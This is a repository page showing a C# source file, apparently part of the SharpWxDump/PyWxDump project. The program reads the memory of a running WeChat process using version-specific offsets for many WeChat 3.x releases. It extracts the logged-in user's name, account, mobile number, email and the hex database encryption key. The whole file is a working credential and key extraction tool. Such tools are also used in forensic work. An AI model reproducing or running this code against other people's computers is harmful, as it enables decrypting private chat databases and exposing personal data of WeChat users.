cyonjan/PyWxDump
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
40a3c753e7
PyWxDump/Program.cs
AdminTest0 de63fda86c SharpWxDump
2022-07-17 22:41:47 +08:00

524 lines
9.8 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
namespace WeChatGetKey
{
internal class Program
{
private static void Main(string[] args)
{
try
{
Program.ReadTest();
}
catch (Exception ex)
{
Console.WriteLine("Error" + ex.Message);
}
finally
{
//Console.ReadKey();
}
Console.WriteLine("[+] Done.");
}
private static void ReadTest()
{;
Process WeChatProcess = null;
Process[] WeChatProcessName = Process.GetProcessesByName("WeChat");
List<int> list = null;
foreach (Process WeChatProcess2 in WeChatProcessName)
{
WeChatProcess = WeChatProcess2;
Console.WriteLine("[+] WeChatProcessPID: " + WeChatProcess2.Id.ToString());
foreach (object obj in WeChatProcess.Modules)
{
ProcessModule processModule = (ProcessModule)obj;
if (processModule.ModuleName == "WeChatWin.dll")
{
Program.WeChatWinBaseAddress = processModule.BaseAddress;
string fileVersion = processModule.FileVersionInfo.FileVersion;
Console.WriteLine("[+] WeChatVersion: " + fileVersion);
if (!Program.versionlist.TryGetValue(fileVersion, out list))
{
Console.WriteLine("[-] WeChat Current Version Is: " + fileVersion + " Not Support");
return;
}
break;
}
}
if (list == null)
{
Console.WriteLine("[-] WeChat Base Address Get Faild");
}
else
{
int WeChatName = (int)Program.WeChatWinBaseAddress + list[0];
Console.WriteLine("[+] WeChatName: " + Program.GetName(WeChatProcess.Handle, (IntPtr)WeChatName, 100));
int WeChatAccount = (int)Program.WeChatWinBaseAddress + list[1];
string Account = Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatAccount);
if (string.IsNullOrWhiteSpace(Account))
{
Console.WriteLine("[-] WeChatAccount: Can't Get User Account, Maybe No Login");
}
else
{
Console.WriteLine("[+] WeChatAccount: " + Program.GetAccount(WeChatProcess.Handle, (IntPtr)WeChatAccount, 100));
}
int WeChatMobile = (int)Program.WeChatWinBaseAddress + list[2];
string Mobile = Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatMobile);
if (string.IsNullOrWhiteSpace(Mobile))
{
Console.WriteLine("[-] WeChatMobile: Can't Get User Mobile, Maybe No Login or Maybe User Is No Binding Mobile");
}
else
{
Console.WriteLine("[+] WeChatMobile: " + Program.GetMobile(WeChatProcess.Handle, (IntPtr)WeChatMobile, 100));
}
int WeChatMail = (int)Program.WeChatWinBaseAddress + list[3];
string Mail = Program.GetMail(WeChatProcess.Handle, (IntPtr)WeChatMail);
if (string.IsNullOrWhiteSpace(Mail))
{
Console.WriteLine("[-] WeChatMail: Can't Get User Mail, Maybe User Is No Binding Email Address or The current is New Version");
}
else
{
Console.WriteLine("[+] WeChatMail: " + Program.GetMail(WeChatProcess.Handle, (IntPtr)WeChatMail, 100));
}
int WeChatKey = (int)Program.WeChatWinBaseAddress + list[4];
string HexKey = Program.GetHex(WeChatProcess.Handle, (IntPtr)WeChatKey);
if (string.IsNullOrWhiteSpace(HexKey))
{
Console.WriteLine("[-] WeChatKey: WeChat Is Run, But Maybe No Login");
return;
}
else
{
Console.WriteLine("[+] WeChatKey: " + HexKey);
}
}
}
if (WeChatProcess == null)
{
Console.WriteLine("[-] WeChat No Run");
return;
}
}
private static string GetName(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100)
{
byte[] array = new byte[nSize];
if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0)
{
return "";
}
string text = "";
foreach (char c in Encoding.UTF8.GetString(array))
{
if (c == '\0')
{
break;
}
text += c.ToString();
}
return text;
}
private static string GetAccount(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100)
{
byte[] array = new byte[nSize];
if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0)
{
return "";
}
string text = "";
foreach (char c in Encoding.UTF8.GetString(array))
{
if (c == '\0')
{
break;
}
text += c.ToString();
}
return text;
}
private static string GetMobile(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100)
{
byte[] array = new byte[nSize];
if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0)
{
return "";
}
string text = "";
foreach (char c in Encoding.UTF8.GetString(array))
{
if (c == '\0')
{
break;
}
text += c.ToString();
}
return text;
}
private static string GetMail(IntPtr hProcess, IntPtr lpBaseAddress, int nSize = 100)
{
byte[] array = new byte[nSize];
if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, nSize, 0) == 0)
{
return "";
}
string text = "";
foreach (char c in Encoding.UTF8.GetString(array))
{
if (c == '\0')
{
break;
}
text += c.ToString();
}
return text;
}
private static string GetHex(IntPtr hProcess, IntPtr lpBaseAddress)
{
byte[] array = new byte[4];
if (Program.ReadProcessMemory(hProcess, lpBaseAddress, array, 4, 0) == 0)
{
return "";
}
int num = 32;
byte[] array2 = new byte[num];
IntPtr lpBaseAddress2 = (IntPtr)(((int)array[3] << 24) + ((int)array[2] << 16) + ((int)array[1] << 8) + (int)array[0]);
if (Program.ReadProcessMemory(hProcess, lpBaseAddress2, array2, num, 0) == 0)
{
return "";
}
return Program.bytes2hex(array2);
}
private static string bytes2hex(byte[] bytes)
{
return BitConverter.ToString(bytes, 0).Replace("-", string.Empty).ToLower().ToUpper();
}
[DllImport("kernel32.dll")]
public static extern int OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
public static extern int GetModuleHandleA(string moduleName);
[DllImport("kernel32.dll")]
public static extern int ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, int lpNumberOfBytesRead);
public static Dictionary<string, List<int>> versionlist = new Dictionary<string, List<int>>
{
{
"3.2.1.154",
new List<int>
{
328121948,
328122328,
328123056,
328121976,
328123020
}
},
{
"3.3.0.115",
new List<int>
{
31323364,
31323744,
31324472,
31323392,
31324436
}
},
{
"3.3.0.84",
new List<int>
{
31315212,
31315592,
31316320,
31315240,
31316284
}
},
{
"3.3.0.93",
new List<int>
{
31323364,
31323744,
31324472,
31323392,
31324436
}
},
{
"3.3.5.34",
new List<int>
{
30603028,
30603408,
30604120,
30603056,
30604100
}
},
{
"3.3.5.42",
new List<int>
{
30603012,
30603392,
30604120,
30603040,
30604084
}
},
{
"3.3.5.46",
new List<int>
{
30578372,
30578752,
30579480,
30578400,
30579444
}
},
{
"3.4.0.37",
new List<int>
{
31608116,
31608496,
31609224,
31608144,
31609188
}
},
{
"3.4.0.38",
new List<int>
{
31604044,
31604424,
31605152,
31604072,
31605116
}
},
{
"3.4.0.50",
new List<int>
{
31688500,
31688880,
31689608,
31688528,
31689572
}
},
{
"3.4.0.54",
new List<int>
{
31700852,
31701248,
31700920,
31700880,
31701924
}
},
{
"3.4.5.27",
new List<int>
{
32133788,
32134168,
32134896,
32133816,
32134860
}
},
{
"3.4.5.45",
new List<int>
{
32147012,
32147392,
32147064,
32147040,
32148084
}
},
{
"3.5.0.20",
new List<int>
{
35494484,
35494864,
35494536,
35494512,
35495556
}
},
{
"3.5.0.29",
new List<int>
{
35507980,
35508360,
35508032,
35508008,
35509052
}
},
{
"3.5.0.33",
new List<int>
{
35512140,
35512520,
35512192,
35512168,
35513212
}
},
{
"3.5.0.39",
new List<int>
{
35516236,
35516616,
35516288,
35516264,
35517308
}
},
{
"3.5.0.42",
new List<int>
{
35512140,
35512520,
35512192,
35512168,
35513212
}
},
{
"3.5.0.44",
new List<int>
{
35510836,
35511216,
35510896,
35510864,
35511908
}
},
{
"3.5.0.46",
new List<int>
{
35506740,
35507120,
35506800,
35506768,
35507812
}
},
{
"3.6.0.18",
new List<int>
{
35842996,
35843376,
35843048,
35843024,
35844068
}
},
{
"3.6.5.7",
new List<int>
{
35864356,
35864736,
35864408,
35864384,
35865428
}
},
{
"3.6.5.16",
new List<int>
{
35909428,
35909808,
35909480,
35909456,
35910500
}
},
{
"3.7.0.26",
new List<int>
{
37105908,
37106288,
37105960,
37105936,
37106980
}
},
{
"3.7.0.29",
new List<int>
{
37105908,
37106288,
37105960,
37105936,
37106980
}
},
{
"3.7.0.30",
new List<int>
{
37118196,
37118576,
37118248,
37118224,
37119268
}
},
{
"3.7.5.11",
new List<int>
{
37883280,
37884088,
37883136,
37883008,
37884052
}
},
{
"3.7.5.23",
new List<int>
{
37895736,
37896544,
37895592,
37883008,
37896508
}
}
};
private static IntPtr WeChatWinBaseAddress = IntPtr.Zero;
}
}
Reference in New Issue View Git Blame Copy Permalink